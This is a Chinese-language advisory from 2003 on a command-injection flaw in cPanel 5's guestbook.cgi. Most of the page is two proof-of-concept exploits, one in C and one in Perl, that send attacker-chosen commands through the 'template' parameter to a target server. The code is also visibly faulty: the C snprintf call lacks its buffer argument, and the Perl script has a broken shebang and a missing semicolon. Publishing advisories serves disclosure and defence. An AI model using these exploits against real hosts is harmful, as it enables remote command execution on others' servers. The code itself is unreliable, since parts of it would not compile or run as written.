cPanel guestbook.cgi远程执行命令漏洞发布时间:2003-03-09 更新时间:2003-03-09 严重程度:高 威胁程度:普通用户访问权限 错误类型:输入验证错误 利用方式:服务器模式 BUGTRAQ ID:6882 受影响系统 cPanel cPanel 5.0详细描述 cPanel CGI软件的guestbook.cgi实现上存在输入验证漏洞,脚本没有对外部提交的数据做充分过滤,远程入侵者可能利用此漏洞以Web服务进程的权限执行任意命令。cPanel版本5受此漏洞影响,之前的版本也极有可能受影响。 测试代码 /* * DSR-cpanel.c by bob@dtors.net * Vulnerbility found by Polkeyzz * * This is a Proof of Concept exploit for * the cpanel 5 and below. Problem is a open() * in guestbook.cgi. * * User may view any file or execute commands. * There also exists a local vulnerbility to * escalate privileges to root. * * PoC by bob of dtors.net >>DSR-apache rewrite<< */ #include <stdio.h> #include <unistd.h> #include <string.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> int main(int argc, char *argv[]) { int sock; char exp[75]; struct in_addr addr; struct sockaddr_in sin; struct hostent *bob; fprintf(stdout, "\n\tDSR-cpanel.c By bob.\n"); fprintf(stdout, "Proof Of Concept Code for cpanel 5.0 <\n"); fprintf(stdout, "\tDSR-[www.dtors.net]-DSR\n"); if(argc<3) { fprintf(stderr, "\nUsage : %s <host> <command>\n\n", argv[0]); exit(1); } if ((bob=gethostbyname(argv[1])) == NULL) { fprintf(stderr, "Socket Error!\n\n"); exit(1); } sock=socket(AF_INET, SOCK_STREAM, 0); bcopy(bob->h_addr, (char *)&sin.sin_addr, bob->h_length); sin.sin_family=AF_INET; sin.sin_port=htons(80); fprintf(stdout, "Connecting...\n"); if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0) { fprintf(stderr, "...Problem Connecting, Exited.\n"); exit(1); } else { snprintf(sizeof(exp)-1, "GET /cgi-sys/guestbook.cgi/user=cpanel&template=%s HTTP/1.1\r\nHost: %s\r\n\r\n" ,argv[2], argv[1]); write(sock,exp,strlen(exp)); fprintf(stdout, "Command sent/executed!\n\n"); close(sock); exit (0); } } #!usr/bin/perl use LWP::UserAgent print "##########################################\n"; print "# #\n"; print "# Remote Exploit for Cpanel 5 #\n"; print "# #\n"; print "##########################################\n"; print " C0d3r: CaMaLeoN\n"; die "Use: $0 <host> <command>\n" unless ($ARGV[1]); $web=$ARGV[0]; $comando=$ARGV[1]; $fallos="cgi-sys/guestbook.cgi?user=cpanel&template=$comando"; $url="http://$web/$fallos"; $ua = LWP::UserAgent->new(); $request = HTTP::Request->new('HEAD', $url); $response = $ua->request($request); if ($response->code == 200){ print "Command sent.\n"; } else { print "The command could not be sent.\n"; } 解决方案 厂商已经在6.0版本的软件中修复了此漏洞: http://www.cpanel.net/realindex.html?from= 相关信息 pokleyzz <pokleyzz@scan-associates.net> Cpanel 5 and below remote command execution and local root vulnerabilities http://archives.neohapsis.com/archives/bugtraq/2003-02/0219.html |
